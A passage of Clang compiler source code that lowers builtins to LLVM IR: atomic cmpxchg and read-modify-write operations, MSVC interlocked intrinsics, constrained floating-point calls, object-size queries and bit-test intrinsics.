llvm::IntegerType::get(CGF.getLLVMContext(),
CGF.getContext().getTypeSize(T));
llvm::Type *IntPtrType = IntType->getPointerTo(AddrSpace);
llvm::Value *Args[2];
Args[1] = CGF.EmitScalarExpr(E->getArg(1));
llvm::Type *ValueType = Args[1]->getType();
Args[1] = EmitToInt(CGF, Args[1], T, IntType);
Args[0] = CGF.Builder.CreateBitCast(DestPtr, IntPtrType);
llvm::Value *Result = CGF.Builder.CreateAtomicRMW(
Kind, Args[0], Args[1], llvm::AtomicOrdering::SequentiallyConsistent);
Result = CGF.Builder.CreateBinOp(Op, Result, Args[1]);
if (Invert)
Result =
CGF.Builder.CreateBinOp(llvm::Instruction::Xor, Result,
llvm::ConstantInt::getAllOnesValue(IntType));
Result = EmitFromInt(CGF, Result, T, ValueType);
return RValue::get(Result);
}
/// Utility to insert an atomic cmpxchg instruction.
///
/// @param CGF The current codegen function.
/// @param E Builtin call expression to convert to cmpxchg.
/// arg0 - address to operate on
/// arg1 - value to compare with
/// arg2 - new value
/// @param ReturnBool Specifies whether to return success flag of
/// cmpxchg result or the old value.
///
/// @returns result of cmpxchg, according to ReturnBool
///
/// Note: to lower Microsoft's _InterlockedCompareExchange* intrinsics,
/// invoke the function EmitAtomicCmpXchgForMSIntrin instead.
static Value *MakeAtomicCmpXchgValue(CodeGenFunction &CGF, const CallExpr *E,
bool ReturnBool) {
QualType T = ReturnBool ? E->getArg(1)->getType() : E->getType();
llvm::Value *DestPtr = CGF.EmitScalarExpr(E->getArg(0));
unsigned AddrSpace = DestPtr->getType()->getPointerAddressSpace();
llvm::IntegerType *IntType = llvm::IntegerType::get(
CGF.getLLVMContext(), CGF.getContext().getTypeSize(T));
llvm::Type *IntPtrType = IntType->getPointerTo(AddrSpace);
Value *Args[3];
Args[0] = CGF.Builder.CreateBitCast(DestPtr, IntPtrType);
Args[1] = CGF.EmitScalarExpr(E->getArg(1));
llvm::Type *ValueType = Args[1]->getType();
Args[1] = EmitToInt(CGF, Args[1], T, IntType);
Args[2] = EmitToInt(CGF, CGF.EmitScalarExpr(E->getArg(2)), T, IntType);
Value *Pair = CGF.Builder.CreateAtomicCmpXchg(
Args[0], Args[1], Args[2], llvm::AtomicOrdering::SequentiallyConsistent,
llvm::AtomicOrdering::SequentiallyConsistent);
if (ReturnBool)
// Extract boolean success flag and zext it to int.
return CGF.Builder.CreateZExt(CGF.Builder.CreateExtractValue(Pair, 1),
CGF.ConvertType(E->getType()));
else
// Extract old value and emit it using the same type as compare value.
return EmitFromInt(CGF, CGF.Builder.CreateExtractValue(Pair, 0), T,
ValueType);
}
/// This function should be invoked to emit atomic cmpxchg for Microsoft's
/// _InterlockedCompareExchange* intrinsics which have the following signature:
/// T _InterlockedCompareExchange(T volatile *Destination,
/// T Exchange,
/// T Comparand);
///
/// Whereas the llvm 'cmpxchg' instruction has the following syntax:
/// cmpxchg *Destination, Comparand, Exchange.
/// So we need to swap Comparand and Exchange when invoking
/// CreateAtomicCmpXchg. That is the reason we could not use the above utility
/// function MakeAtomicCmpXchgValue since it expects the arguments to be
/// already swapped.
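/// For example, _InterlockedCompareExchange(&v, /*Exchange=*/1,
/// /*Comparand=*/0) lowers to 'cmpxchg %v, 0, 1': the value to compare
/// against comes first and the replacement value second, the reverse of the
/// MSVC argument order.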
static
Value *EmitAtomicCmpXchgForMSIntrin(CodeGenFunction &CGF, const CallExpr *E,
AtomicOrdering SuccessOrdering = AtomicOrdering::SequentiallyConsistent) {
assert(E->getArg(0)->getType()->isPointerType());
assert(CGF.getContext().hasSameUnqualifiedType(
E->getType(), E->getArg(0)->getType()->getPointeeType()));
assert(CGF.getContext().hasSameUnqualifiedType(E->getType(),
E->getArg(1)->getType()));
assert(CGF.getContext().hasSameUnqualifiedType(E->getType(),
E->getArg(2)->getType()));
auto *Destination = CGF.EmitScalarExpr(E->getArg(0));
auto *Comparand = CGF.EmitScalarExpr(E->getArg(2));
auto *Exchange = CGF.EmitScalarExpr(E->getArg(1));
// For Release ordering, the failure ordering should be Monotonic.
auto FailureOrdering = SuccessOrdering == AtomicOrdering::Release ?
AtomicOrdering::Monotonic :
SuccessOrdering;
// The atomic instruction is marked volatile for consistency with MSVC. This
// blocks the few atomics optimizations that LLVM has. If we want to optimize
// _Interlocked* operations in the future, we will have to remove the volatile
// marker.
auto *Result = CGF.Builder.CreateAtomicCmpXchg(
Destination, Comparand, Exchange,
SuccessOrdering, FailureOrdering);
Result->setVolatile(true);
return CGF.Builder.CreateExtractValue(Result, 0);
}
// 64-bit Microsoft platforms support 128-bit cmpxchg operations. They are
// prototyped like this:
//
// unsigned char _InterlockedCompareExchange128...(
// __int64 volatile * _Destination,
// __int64 _ExchangeHigh,
// __int64 _ExchangeLow,
// __int64 * _ComparandResult);
static Value *EmitAtomicCmpXchg128ForMSIntrin(CodeGenFunction &CGF,
const CallExpr *E,
AtomicOrdering SuccessOrdering) {
assert(E->getNumArgs() == 4);
llvm::Value *Destination = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *ExchangeHigh = CGF.EmitScalarExpr(E->getArg(1));
llvm::Value *ExchangeLow = CGF.EmitScalarExpr(E->getArg(2));
llvm::Value *ComparandPtr = CGF.EmitScalarExpr(E->getArg(3));
assert(Destination->getType()->isPointerTy());
assert(!ExchangeHigh->getType()->isPointerTy());
assert(!ExchangeLow->getType()->isPointerTy());
assert(ComparandPtr->getType()->isPointerTy());
// For Release ordering, the failure ordering should be Monotonic.
auto FailureOrdering = SuccessOrdering == AtomicOrdering::Release
? AtomicOrdering::Monotonic
: SuccessOrdering;
// Convert to i128 pointers and values.
llvm::Type *Int128Ty = llvm::IntegerType::get(CGF.getLLVMContext(), 128);
llvm::Type *Int128PtrTy = Int128Ty->getPointerTo();
Destination = CGF.Builder.CreateBitCast(Destination, Int128PtrTy);
Address ComparandResult(CGF.Builder.CreateBitCast(ComparandPtr, Int128PtrTy),
CGF.getContext().toCharUnitsFromBits(128));
// (((i128)hi) << 64) | ((i128)lo)
ExchangeHigh = CGF.Builder.CreateZExt(ExchangeHigh, Int128Ty);
ExchangeLow = CGF.Builder.CreateZExt(ExchangeLow, Int128Ty);
ExchangeHigh =
CGF.Builder.CreateShl(ExchangeHigh, llvm::ConstantInt::get(Int128Ty, 64));
llvm::Value *Exchange = CGF.Builder.CreateOr(ExchangeHigh, ExchangeLow);
// Load the comparand for the instruction.
llvm::Value *Comparand = CGF.Builder.CreateLoad(ComparandResult);
auto *CXI = CGF.Builder.CreateAtomicCmpXchg(Destination, Comparand, Exchange,
SuccessOrdering, FailureOrdering);
// The atomic instruction is marked volatile for consistency with MSVC. This
// blocks the few atomics optimizations that LLVM has. If we want to optimize
// _Interlocked* operations in the future, we will have to remove the volatile
// marker.
CXI->setVolatile(true);
// Store the result as an outparameter.
CGF.Builder.CreateStore(CGF.Builder.CreateExtractValue(CXI, 0),
ComparandResult);
// Get the success boolean and zero extend it to i8.
Value *Success = CGF.Builder.CreateExtractValue(CXI, 1);
return CGF.Builder.CreateZExt(Success, CGF.Int8Ty);
}
static Value *EmitAtomicIncrementValue(CodeGenFunction &CGF, const CallExpr *E,
AtomicOrdering Ordering = AtomicOrdering::SequentiallyConsistent) {
assert(E->getArg(0)->getType()->isPointerType());
auto *IntTy = CGF.ConvertType(E->getType());
auto *Result = CGF.Builder.CreateAtomicRMW(
AtomicRMWInst::Add,
CGF.EmitScalarExpr(E->getArg(0)),
ConstantInt::get(IntTy, 1),
Ordering);
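  // atomicrmw returns the value before the addition, but the MSVC-style
  // intrinsic returns the incremented value, so add 1 to the result.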
return CGF.Builder.CreateAdd(Result, ConstantInt::get(IntTy, 1));
}
static Value *EmitAtomicDecrementValue(CodeGenFunction &CGF, const CallExpr *E,
AtomicOrdering Ordering = AtomicOrdering::SequentiallyConsistent) {
assert(E->getArg(0)->getType()->isPointerType());
auto *IntTy = CGF.ConvertType(E->getType());
auto *Result = CGF.Builder.CreateAtomicRMW(
AtomicRMWInst::Sub,
CGF.EmitScalarExpr(E->getArg(0)),
ConstantInt::get(IntTy, 1),
Ordering);
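  // Likewise, subtract 1 so the returned value matches the post-decrement
  // result expected from the MSVC-style intrinsic.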
return CGF.Builder.CreateSub(Result, ConstantInt::get(IntTy, 1));
}
// Build a plain volatile load.
static Value *EmitISOVolatileLoad(CodeGenFunction &CGF, const CallExpr *E) {
Value *Ptr = CGF.EmitScalarExpr(E->getArg(0));
QualType ElTy = E->getArg(0)->getType()->getPointeeType();
CharUnits LoadSize = CGF.getContext().getTypeSizeInChars(ElTy);
llvm::Type *ITy =
llvm::IntegerType::get(CGF.getLLVMContext(), LoadSize.getQuantity() * 8);
Ptr = CGF.Builder.CreateBitCast(Ptr, ITy->getPointerTo());
llvm::LoadInst *Load = CGF.Builder.CreateAlignedLoad(ITy, Ptr, LoadSize);
Load->setVolatile(true);
return Load;
}
// Build a plain volatile store.
static Value *EmitISOVolatileStore(CodeGenFunction &CGF, const CallExpr *E) {
Value *Ptr = CGF.EmitScalarExpr(E->getArg(0));
Value *Value = CGF.EmitScalarExpr(E->getArg(1));
QualType ElTy = E->getArg(0)->getType()->getPointeeType();
CharUnits StoreSize = CGF.getContext().getTypeSizeInChars(ElTy);
llvm::Type *ITy =
llvm::IntegerType::get(CGF.getLLVMContext(), StoreSize.getQuantity() * 8);
Ptr = CGF.Builder.CreateBitCast(Ptr, ITy->getPointerTo());
llvm::StoreInst *Store =
CGF.Builder.CreateAlignedStore(Value, Ptr, StoreSize);
Store->setVolatile(true);
return Store;
}
// Emit a simple mangled intrinsic that has 1 argument and a return type
// matching the argument type. Depending on mode, this may be a constrained
// floating-point intrinsic.
static Value *emitUnaryMaybeConstrainedFPBuiltin(CodeGenFunction &CGF,
const CallExpr *E, unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID, Src0->getType());
return CGF.Builder.CreateConstrainedFPCall(F, { Src0 });
} else {
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, Src0);
}
}
// Emit an intrinsic that has 2 operands of the same type as its result.
// Depending on mode, this may be a constrained floating-point intrinsic.
static Value *emitBinaryMaybeConstrainedFPBuiltin(CodeGenFunction &CGF,
const CallExpr *E, unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID, Src0->getType());
return CGF.Builder.CreateConstrainedFPCall(F, { Src0, Src1 });
} else {
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, { Src0, Src1 });
}
}
// Emit an intrinsic that has 3 operands of the same type as its result.
// Depending on mode, this may be a constrained floating-point intrinsic.
static Value *emitTernaryMaybeConstrainedFPBuiltin(CodeGenFunction &CGF,
const CallExpr *E, unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = CGF.EmitScalarExpr(E->getArg(2));
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID, Src0->getType());
return CGF.Builder.CreateConstrainedFPCall(F, { Src0, Src1, Src2 });
} else {
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, { Src0, Src1, Src2 });
}
}
// Emit an intrinsic where all operands are of the same type as the result.
// Depending on mode, this may be a constrained floating-point intrinsic.
static Value *emitCallMaybeConstrainedFPBuiltin(CodeGenFunction &CGF,
unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID,
llvm::Type *Ty,
ArrayRef<Value *> Args) {
  if (CGF.Builder.getIsFPConstrained()) {
    Function *F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID, Ty);
    return CGF.Builder.CreateConstrainedFPCall(F, Args);
  }
  Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Ty);
  return CGF.Builder.CreateCall(F, Args);
}
// Emit a simple mangled intrinsic that has 1 argument and a return type
// matching the argument type.
static Value *emitUnaryBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
unsigned IntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, Src0);
}
// Emit an intrinsic that has 2 operands of the same type as its result.
static Value *emitBinaryBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
unsigned IntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, { Src0, Src1 });
}
// Emit an intrinsic that has 3 operands of the same type as its result.
static Value *emitTernaryBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
unsigned IntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = CGF.EmitScalarExpr(E->getArg(2));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, { Src0, Src1, Src2 });
}
// Emit an intrinsic that has 1 float or double operand, and 1 integer.
static Value *emitFPIntBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
unsigned IntrinsicID) {
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = CGF.EmitScalarExpr(E->getArg(1));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, Src0->getType());
return CGF.Builder.CreateCall(F, {Src0, Src1});
}
// Emit an intrinsic that has overloaded integer result and fp operand.
static Value *
emitMaybeConstrainedFPToIntRoundBuiltin(CodeGenFunction &CGF, const CallExpr *E,
unsigned IntrinsicID,
unsigned ConstrainedIntrinsicID) {
llvm::Type *ResultType = CGF.ConvertType(E->getType());
llvm::Value *Src0 = CGF.EmitScalarExpr(E->getArg(0));
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *F = CGF.CGM.getIntrinsic(ConstrainedIntrinsicID,
{ResultType, Src0->getType()});
return CGF.Builder.CreateConstrainedFPCall(F, {Src0});
} else {
Function *F =
CGF.CGM.getIntrinsic(IntrinsicID, {ResultType, Src0->getType()});
return CGF.Builder.CreateCall(F, Src0);
}
}
/// EmitFAbs - Emit a call to @llvm.fabs().
static Value *EmitFAbs(CodeGenFunction &CGF, Value *V) {
Function *F = CGF.CGM.getIntrinsic(Intrinsic::fabs, V->getType());
llvm::CallInst *Call = CGF.Builder.CreateCall(F, V);
Call->setDoesNotAccessMemory();
return Call;
}
/// Emit the computation of the sign bit for a floating point value. Returns
/// the i1 sign bit value.
static Value *EmitSignBit(CodeGenFunction &CGF, Value *V) {
LLVMContext &C = CGF.CGM.getLLVMContext();
llvm::Type *Ty = V->getType();
int Width = Ty->getPrimitiveSizeInBits();
llvm::Type *IntTy = llvm::IntegerType::get(C, Width);
V = CGF.Builder.CreateBitCast(V, IntTy);
if (Ty->isPPC_FP128Ty()) {
// We want the sign bit of the higher-order double. The bitcast we just
// did works as if the double-double was stored to memory and then
// read as an i128. The "store" will put the higher-order double in the
// lower address in both little- and big-Endian modes, but the "load"
// will treat those bits as a different part of the i128: the low bits in
// little-Endian, the high bits in big-Endian. Therefore, on big-Endian
// we need to shift the high bits down to the low before truncating.
Width >>= 1;
if (CGF.getTarget().isBigEndian()) {
Value *ShiftCst = llvm::ConstantInt::get(IntTy, Width);
V = CGF.Builder.CreateLShr(V, ShiftCst);
}
// We are truncating value in order to extract the higher-order
// double, which we will be using to extract the sign from.
IntTy = llvm::IntegerType::get(C, Width);
V = CGF.Builder.CreateTrunc(V, IntTy);
}
Value *Zero = llvm::Constant::getNullValue(IntTy);
return CGF.Builder.CreateICmpSLT(V, Zero);
}
static RValue emitLibraryCall(CodeGenFunction &CGF, const FunctionDecl *FD,
const CallExpr *E, llvm::Constant *calleeValue) {
CGCallee callee = CGCallee::forDirect(calleeValue, GlobalDecl(FD));
return CGF.EmitCall(E->getCallee()->getType(), callee, E, ReturnValueSlot());
}
/// Emit a call to llvm.{sadd,uadd,ssub,usub,smul,umul}.with.overflow.*
/// depending on IntrinsicID.
///
/// \arg CGF The current codegen function.
/// \arg IntrinsicID The ID for the Intrinsic we wish to generate.
/// \arg X The first argument to the llvm.*.with.overflow.*.
/// \arg Y The second argument to the llvm.*.with.overflow.*.
/// \arg Carry The carry returned by the llvm.*.with.overflow.*.
/// \returns The result (i.e. sum/product) returned by the intrinsic.
static llvm::Value *EmitOverflowIntrinsic(CodeGenFunction &CGF,
const llvm::Intrinsic::ID IntrinsicID,
llvm::Value *X, llvm::Value *Y,
llvm::Value *&Carry) {
// Make sure we have integers of the same width.
assert(X->getType() == Y->getType() &&
"Arguments must be the same type. (Did you forget to make sure both "
"arguments have the same integer width?)");
Function *Callee = CGF.CGM.getIntrinsic(IntrinsicID, X->getType());
llvm::Value *Tmp = CGF.Builder.CreateCall(Callee, {X, Y});
Carry = CGF.Builder.CreateExtractValue(Tmp, 1);
return CGF.Builder.CreateExtractValue(Tmp, 0);
}
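// Emit a zero-operand intrinsic call annotated with !range metadata, telling
// later optimizations that the result lies in the half-open range [low, high).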
static Value *emitRangedBuiltin(CodeGenFunction &CGF,
unsigned IntrinsicID,
int low, int high) {
llvm::MDBuilder MDHelper(CGF.getLLVMContext());
llvm::MDNode *RNode = MDHelper.createRange(APInt(32, low), APInt(32, high));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID, {});
llvm::Instruction *Call = CGF.Builder.CreateCall(F);
Call->setMetadata(llvm::LLVMContext::MD_range, RNode);
return Call;
}
namespace {
struct WidthAndSignedness {
unsigned Width;
bool Signed;
};
}
static WidthAndSignedness
getIntegerWidthAndSignedness(const clang::ASTContext &context,
const clang::QualType Type) {
assert(Type->isIntegerType() && "Given type is not an integer.");
unsigned Width = Type->isBooleanType() ? 1
: Type->isExtIntType() ? context.getIntWidth(Type)
: context.getTypeInfo(Type).Width;
bool Signed = Type->isSignedIntegerType();
return {Width, Signed};
}
// Given one or more integer types, this function produces an integer type that
// encompasses them: any value in one of the given types could be expressed in
// the encompassing type.
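// For example, encompassing {signed 16-bit, unsigned 32-bit} is a signed
// 33-bit type: the result must be signed, and it takes 33 bits for a signed
// type to represent every unsigned 32-bit value.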
static struct WidthAndSignedness
EncompassingIntegerType(ArrayRef<struct WidthAndSignedness> Types) {
assert(Types.size() > 0 && "Empty list of types.");
// If any of the given types is signed, we must return a signed type.
bool Signed = false;
for (const auto &Type : Types) {
Signed |= Type.Signed;
}
// The encompassing type must have a width greater than or equal to the width
// of the specified types. Additionally, if the encompassing type is signed,
// its width must be strictly greater than the width of any unsigned types
// given.
unsigned Width = 0;
for (const auto &Type : Types) {
unsigned MinWidth = Type.Width + (Signed && !Type.Signed);
if (Width < MinWidth) {
Width = MinWidth;
}
}
return {Width, Signed};
}
Value *CodeGenFunction::EmitVAStartEnd(Value *ArgValue, bool IsStart) {
llvm::Type *DestType = Int8PtrTy;
if (ArgValue->getType() != DestType)
ArgValue =
Builder.CreateBitCast(ArgValue, DestType, ArgValue->getName().data());
Intrinsic::ID inst = IsStart ? Intrinsic::vastart : Intrinsic::vaend;
return Builder.CreateCall(CGM.getIntrinsic(inst), ArgValue);
}
/// Checks if using the result of __builtin_object_size(p, @p From) in place of
/// __builtin_object_size(p, @p To) is correct
static bool areBOSTypesCompatible(int From, int To) {
// Note: Our __builtin_object_size implementation currently treats Type=0 and
// Type=2 identically. Encoding this implementation detail here may make
// improving __builtin_object_size difficult in the future, so it's omitted.
return From == To || (From == 0 && To == 1) || (From == 3 && To == 2);
}
static llvm::Value *
getDefaultBuiltinObjectSizeResult(unsigned Type, llvm::IntegerType *ResType) {
return ConstantInt::get(ResType, (Type & 2) ? 0 : -1, /*isSigned=*/true);
}
llvm::Value *
CodeGenFunction::evaluateOrEmitBuiltinObjectSize(const Expr *E, unsigned Type,
llvm::IntegerType *ResType,
llvm::Value *EmittedE,
bool IsDynamic) {
uint64_t ObjectSize;
if (!E->tryEvaluateObjectSize(ObjectSize, getContext(), Type))
return emitBuiltinObjectSize(E, Type, ResType, EmittedE, IsDynamic);
return ConstantInt::get(ResType, ObjectSize, /*isSigned=*/true);
}
/// Returns a Value corresponding to the size of the given expression.
/// This Value may be either of the following:
/// - A llvm::Argument (if E is a param with the pass_object_size attribute on
/// it)
/// - A call to the @llvm.objectsize intrinsic
///
/// EmittedE is the result of emitting `E` as a scalar expr. If it's non-null
/// and we wouldn't otherwise try to reference a pass_object_size parameter,
/// we'll call @llvm.objectsize on EmittedE, rather than emitting E.
llvm::Value *
CodeGenFunction::emitBuiltinObjectSize(const Expr *E, unsigned Type,
llvm::IntegerType *ResType,
llvm::Value *EmittedE, bool IsDynamic) {
// We need to reference an argument if the pointer is a parameter with the
// pass_object_size attribute.
if (auto *D = dyn_cast<DeclRefExpr>(E->IgnoreParenImpCasts())) {
auto *Param = dyn_cast<ParmVarDecl>(D->getDecl());
auto *PS = D->getDecl()->getAttr<PassObjectSizeAttr>();
if (Param != nullptr && PS != nullptr &&
areBOSTypesCompatible(PS->getType(), Type)) {
auto Iter = SizeArguments.find(Param);
assert(Iter != SizeArguments.end());
const ImplicitParamDecl *D = Iter->second;
auto DIter = LocalDeclMap.find(D);
assert(DIter != LocalDeclMap.end());
return EmitLoadOfScalar(DIter->second, /*Volatile=*/false,
getContext().getSizeType(), E->getBeginLoc());
}
}
// LLVM can't handle Type=3 appropriately, and __builtin_object_size shouldn't
// evaluate E for side-effects. In either case, we shouldn't lower to
// @llvm.objectsize.
if (Type == 3 || (!EmittedE && E->HasSideEffects(getContext())))
return getDefaultBuiltinObjectSizeResult(Type, ResType);
Value *Ptr = EmittedE ? EmittedE : EmitScalarExpr(E);
assert(Ptr->getType()->isPointerTy() &&
"Non-pointer passed to __builtin_object_size?");
Function *F =
CGM.getIntrinsic(Intrinsic::objectsize, {ResType, Ptr->getType()});
// LLVM only supports 0 and 2, make sure that we pass along that as a boolean.
Value *Min = Builder.getInt1((Type & 2) != 0);
  // For GCC compatibility, __builtin_object_size treats NULL as having
  // unknown size.
Value *NullIsUnknown = Builder.getTrue();
Value *Dynamic = Builder.getInt1(IsDynamic);
return Builder.CreateCall(F, {Ptr, Min, NullIsUnknown, Dynamic});
}
namespace {
/// A struct to generically describe a bit test intrinsic.
struct BitTest {
enum ActionKind : uint8_t { TestOnly, Complement, Reset, Set };
enum InterlockingKind : uint8_t {
Unlocked,
Sequential,
Acquire,
Release,
NoFence
};
ActionKind Action;
InterlockingKind Interlocking;
bool Is64Bit;
static BitTest decodeBitTestBuiltin(unsigned BuiltinID);
};
} // namespace
BitTest BitTest::decodeBitTestBuiltin(unsigned BuiltinID) {
switch (BuiltinID) {
// Main portable variants.
case Builtin::BI_bittest:
return {TestOnly, Unlocked, false};
case Builtin::BI_bittestandcomplement:
return {Complement, Unlocked, false};
case Builtin::BI_bittestandreset:
return {Reset, Unlocked, false};
case Builtin::BI_bittestandset:
return {Set, Unlocked, false};
case Builtin::BI_interlockedbittestandreset:
return {Reset, Sequential, false};
case Builtin::BI_interlockedbittestandset:
return {Set, Sequential, false};
// X86-specific 64-bit variants.
case Builtin::BI_bittest64:
return {TestOnly, Unlocked, true};
case Builtin::BI_bittestandcomplement64:
return {Complement, Unlocked, true};
case Builtin::BI_bittestandreset64:
return {Reset, Unlocked, true};
case Builtin::BI_bittestandset64:
return {Set, Unlocked, true};
case Builtin::BI_interlockedbittestandreset64:
return {Reset, Sequential, true};
case Builtin::BI_interlockedbittestandset64:
return {Set, Sequential, true};
// ARM/AArch64-specific ordering variants.
case Builtin::BI_interlockedbittestandset_acq:
return {Set, Acquire, false};
case Builtin::BI_interlockedbittestandset_rel:
return {Set, Release, false};
case Builtin::BI_interlockedbittestandset_nf:
return {Set, NoFence, false};
case Builtin::BI_interlockedbittestandreset_acq:
return {Reset, Acquire, false};
case Builtin::BI_interlockedbittestandreset_rel:
return {Reset, Release, false};
case Builtin::BI_interlockedbittestandreset_nf:
return {Reset, NoFence, false};
}
llvm_unreachable("expected only bittest intrinsics");
}
static char bitActionToX86BTCode(BitTest::ActionKind A) {
switch (A) {
case BitTest::TestOnly: return '\0';
case BitTest::Complement: return 'c';
case BitTest::Reset: return 'r';
case BitTest::Set: return 's';
}
llvm_unreachable("invalid action");
}
static llvm::Value *EmitX86BitTestIntrinsic(CodeGenFunction &CGF,
BitTest BT,
const CallExpr *E, Value *BitBase,
Value *BitPos) {
char Action = bitActionToX86BTCode(BT.Action);
char SizeSuffix = BT.Is64Bit ? 'q' : 'l';
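  // e.g. the 32-bit _interlockedbittestandset yields: lock btsl $2, ($1)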
// Build the assembly.
SmallString<64> Asm;
raw_svector_ostream AsmOS(Asm);
if (BT.Interlocking != BitTest::Unlocked)
AsmOS << "lock ";
AsmOS << "bt";
if (Action)
AsmOS << Action;
AsmOS << SizeSuffix << " $2, ($1)";
// Build the constraints. FIXME: We should support immediates when possible.
std::string Constraints = "={@ccc},r,r,~{cc},~{memory}";
std::string MachineClobbers = CGF.getTarget().getClobbers();
if (!MachineClobbers.empty()) {
Constraints += ',';
Constraints += MachineClobbers;
}
llvm::IntegerType *IntType = llvm::IntegerType::get(
CGF.getLLVMContext(),
CGF.getContext().getTypeSize(E->getArg(1)->getType()));
llvm::Type *IntPtrType = IntType->getPointerTo();
llvm::FunctionType *FTy =
llvm::FunctionType::get(CGF.Int8Ty, {IntPtrType, IntType}, false);
llvm::InlineAsm *IA =
llvm::InlineAsm::get(FTy, Asm, Constraints, /*hasSideEffects=*/true);
return CGF.Builder.CreateCall(IA, {BitBase, BitPos});
}
static llvm::AtomicOrdering
getBitTestAtomicOrdering(BitTest::InterlockingKind I) {
switch (I) {
case BitTest::Unlocked: return llvm::AtomicOrdering::NotAtomic;
case BitTest::Sequential: return llvm::AtomicOrdering::SequentiallyConsistent;
case BitTest::Acquire: return llvm::AtomicOrdering::Acquire;
case BitTest::Release: return llvm::AtomicOrdering::Release;
case BitTest::NoFence: return llvm::AtomicOrdering::Monotonic;
}
llvm_unreachable("invalid interlocking");
}
/// Emit a _bittest* intrinsic. These intrinsics take a pointer to an array of
/// bits and a bit position and read and optionally modify the bit at that
/// position. The position index can be arbitrarily large, i.e. it can be larger
/// than 31 or 63, so we need an indexed load in the general case.
static llvm::Value *EmitBitTestIntrinsic(CodeGenFunction &CGF,
unsigned BuiltinID,
const CallExpr *E) {
Value *BitBase = CGF.EmitScalarExpr(E->getArg(0));
Value *BitPos = CGF.EmitScalarExpr(E->getArg(1));
BitTest BT = BitTest::decodeBitTestBuiltin(BuiltinID);
// X86 has special BT, BTC, BTR, and BTS instructions that handle the array
// indexing operation internally. Use them if possible.
if (CGF.getTarget().getTriple().isX86())
return EmitX86BitTestIntrinsic(CGF, BT, E, BitBase, BitPos);
// Otherwise, use generic code to load one byte and test the bit. Use all but
// the bottom three bits as the array index, and the bottom three bits to form
// a mask.
// Bit = BitBaseI8[BitPos >> 3] & (1 << (BitPos & 0x7)) != 0;
Value *ByteIndex = CGF.Builder.CreateAShr(
BitPos, llvm::ConstantInt::get(BitPos->getType(), 3), "bittest.byteidx");
Value *BitBaseI8 = CGF.Builder.CreatePointerCast(BitBase, CGF.Int8PtrTy);
Address ByteAddr(CGF.Builder.CreateInBoundsGEP(CGF.Int8Ty, BitBaseI8,
ByteIndex, "bittest.byteaddr"),
CharUnits::One());
Value *PosLow =
CGF.Builder.CreateAnd(CGF.Builder.CreateTrunc(BitPos, CGF.Int8Ty),
llvm::ConstantInt::get(CGF.Int8Ty, 0x7));
// The updating instructions will need a mask.
Value *Mask = nullptr;
if (BT.Action != BitTest::TestOnly) {
Mask = CGF.Builder.CreateShl(llvm::ConstantInt::get(CGF.Int8Ty, 1), PosLow,
"bittest.mask");
}
// Check the action and ordering of the interlocked intrinsics.
llvm::AtomicOrdering Ordering = getBitTestAtomicOrdering(BT.Interlocking);
Value *OldByte = nullptr;
if (Ordering != llvm::AtomicOrdering::NotAtomic) {
// Emit a combined atomicrmw load/store operation for the interlocked
// intrinsics.
llvm::AtomicRMWInst::BinOp RMWOp = llvm::AtomicRMWInst::Or;
if (BT.Action == BitTest::Reset) {
Mask = CGF.Builder.CreateNot(Mask);
RMWOp = llvm::AtomicRMWInst::And;
}
OldByte = CGF.Builder.CreateAtomicRMW(RMWOp, ByteAddr.getPointer(), Mask,
Ordering);
} else {
// Emit a plain load for the non-interlocked intrinsics.
OldByte = CGF.Builder.CreateLoad(ByteAddr, "bittest.byte");
Value *NewByte = nullptr;
switch (BT.Action) {
case BitTest::TestOnly:
// Don't store anything.
break;
case BitTest::Complement:
NewByte = CGF.Builder.CreateXor(OldByte, Mask);
break;
case BitTest::Reset:
NewByte = CGF.Builder.CreateAnd(OldByte, CGF.Builder.CreateNot(Mask));
break;
case BitTest::Set:
NewByte = CGF.Builder.CreateOr(OldByte, Mask);
